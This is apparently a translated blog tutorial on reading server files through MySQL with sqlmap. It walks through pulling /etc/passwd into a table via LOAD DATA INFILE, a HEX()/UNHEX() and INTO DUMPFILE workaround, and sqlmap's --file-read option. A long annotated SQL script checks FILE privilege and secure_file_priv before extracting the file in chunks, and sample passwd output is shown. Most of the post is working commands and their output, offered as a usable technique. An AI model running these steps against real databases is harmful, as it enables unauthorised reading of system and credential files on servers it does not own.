昔日

Using sqlmap to read the contents of /etc/passwd

Walking through the years......:

1. Connect to the database and open an interactive SQL shell (the account used here has direct MySQL access and the FILE privilege)



root@kaliPC:~# sqlmap -d mysql://test:test@localhost:3306/test --sql-shell



2. Read the passwd file into the database (this assumes a table testfile with a text column filein already exists; the FIELDS TERMINATED BY string only has to be one that never occurs in the file, so each whole line lands in filein)



sql-shell> LOAD DATA INFILE '/etc/passwd' INTO TABLE testfile FIELDS TERMINATED BY 'fuck' (filein)



3. View the loaded content



sql-shell> select * from testfile



(Partial screenshots of the output appeared here.)



Note: if you run into binary-encoding problems in practice, first hex-encode the data with HEX() and dump it to /tmp/test, then LOAD DATA that hex file into the database



sql-shell> select HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/tmp/test'
select HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/tmp/test':    'NULL'



/tmp/test now holds the whole of /etc/passwd as a single line of hex digits (INTO DUMPFILE writes the raw value with no line terminator), so it is no longer readable as plain text until decoded


Load the hex-encoded file into the database (it becomes a single row)



sql-shell> LOAD DATA INFILE '/tmp/test' INTO TABLE testfile FIELDS TERMINATED BY 'fuck' (filein)



Once loaded, the content can be viewed directly from sql-shell



If you need more, combine it with UNHEX() to decode the hex back into the original bytes, e.g.



sql-shell> select MID(filein,1,1024) from testfile
[10:06:16] [INFO] fetching SQL SELECT statement query output: 'select MID(filein,1,1024) from testfile'
select MID(filein,1,1024) from testfile [2]:
[*] 
[*] (hex string omitted)

sql-shell> select UNHEX(MID(filein,1,1024)) from testfile
[10:06:35] [INFO] fetching SQL SELECT statement query output: 'select UNHEX(MID(filein,1,1024)) from testfile'
select UNHEX(MID(filein,1,1024)) from testfile [2]:
[*] 
[*] root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nr
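Pulling steps 1 to 3 and the HEX()/UNHEX() workaround together, the following is an added example and not code from the original post. It is the complete sequence you would type into `sqlmap ... --sql-shell` (or any MySQL client) to read a server-side file through a table, with the preconditions checked first. `testfile` and `filein` are the post's names; the `id` column, the `<<NOT_IN_FILE>>` delimiter and the chunk offsets are assumptions made here.

```sql
-- Added example, not from the original post. testfile/filein are the
-- post's names; id, the delimiter string and the chunk offsets are assumed.

-- 0. Preconditions. Every file statement below needs the FILE privilege,
--    and secure_file_priv must be '' (unrestricted): NULL disables file
--    access entirely, a directory restricts reads and writes to it.
SHOW GRANTS FOR CURRENT_USER();
SELECT @@secure_file_priv;

-- 1. Receiving table. The AUTO_INCREMENT id records load order, which a
--    later SELECT would otherwise not be guaranteed to preserve.
CREATE TABLE IF NOT EXISTS testfile (
  id     INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  filein LONGTEXT
);

-- 2. One passwd line per row. The field delimiter only has to be a string
--    that never occurs in the file, so each whole line goes into filein
--    (the post used 'fuck'; any unused string works). ESCAPED BY '' stops
--    MySQL from interpreting backslashes found in the data.
LOAD DATA INFILE '/etc/passwd' INTO TABLE testfile
  FIELDS TERMINATED BY '<<NOT_IN_FILE>>' ESCAPED BY ''
  LINES  TERMINATED BY '\n'
  (filein);

-- 3. Check and read back. COUNT(*) should equal `wc -l /etc/passwd`.
--    group_concat_max_len defaults to 1024 bytes, so raise it before
--    reassembling the file in load order.
SELECT COUNT(*) FROM testfile;
SET SESSION group_concat_max_len = 1048576;
SELECT GROUP_CONCAT(filein ORDER BY id SEPARATOR '\n') FROM testfile;

-- 4. Binary-safe variant. LOAD_FILE() reads the file server-side and
--    returns NULL when the file is unreadable by the mysqld user, larger
--    than max_allowed_packet, or blocked by secure_file_priv, so test that
--    first. INTO DUMPFILE writes the value raw: /tmp/test becomes one line
--    of hex digits with no trailing newline.
SELECT LOAD_FILE('/etc/passwd') IS NULL AS unreadable;
SELECT HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/tmp/test';

-- 5. Load the single hex line as one row and decode it in pieces. MID()
--    offsets are 1-based; odd offsets (1, 1025, 2049, ...) with an even
--    length keep every chunk on a byte boundary before UNHEX().
LOAD DATA INFILE '/tmp/test' INTO TABLE testfile
  FIELDS TERMINATED BY '<<NOT_IN_FILE>>' ESCAPED BY ''
  (filein);
SELECT UNHEX(MID(filein, 1, 1024))    AS chunk1
  FROM testfile WHERE id = (SELECT MAX(id) FROM testfile);
SELECT UNHEX(MID(filein, 1025, 1024)) AS chunk2
  FROM testfile WHERE id = (SELECT MAX(id) FROM testfile);

-- 6. Or skip the table round-trip: the hex length tells you how many
--    chunks to fetch, and UNHEX(HEX(x)) returns x unchanged.
SELECT LENGTH(HEX(LOAD_FILE('/etc/passwd'))) / 2 AS file_bytes;
SELECT UNHEX(MID(HEX(LOAD_FILE('/etc/passwd')), 1, 1024)) AS chunk1;
```

When typing into sqlmap's sql-shell, enter each statement on a single line; the line breaks above are for readability only. Note also that /tmp/test is written by the mysqld process, so on hosts where the service runs with a private /tmp namespace the file is visible to the server (which is all steps 4 and 5 need) but not from an ordinary shell.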



A different approach: use sqlmap's own --file-read option instead of doing it by hand



root@kaliPC:# sqlmap -d mysql://test:test@localhost:3306/test --file-read=/etc/passwd




......


do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] 
[11:10:30] [INFO] the local file /root/.sqlmap/output/localhost/files/_etc_passwd and the remote file /etc/passwd have the same size (2736b)
files saved to [1]:
[*] /root/.sqlmap/output/localhost/files/_etc_passwd (same file)



As the output shows, sqlmap read the file and saved a copy under the local output path.
